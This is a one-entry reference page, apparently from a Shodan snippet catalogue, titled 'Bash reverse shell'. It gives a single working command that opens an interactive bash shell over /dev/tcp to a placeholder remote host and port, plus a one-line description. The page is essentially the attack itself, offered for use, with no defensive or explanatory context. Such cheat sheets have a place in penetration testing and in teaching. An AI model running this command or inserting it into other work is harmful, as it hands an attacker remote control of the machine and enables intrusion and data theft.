Bash reverse shell

 
~ $
bash -i >& /dev/tcp/${REMOTE_HOST}/${REMOTE_PORT} 0>&1
shellreverse shellbash

Description

Bash reverse shell connecting to $REMOTE_HOST on port $REMOTE_PORT.




Contact Us

Shodan ® - All rights reserved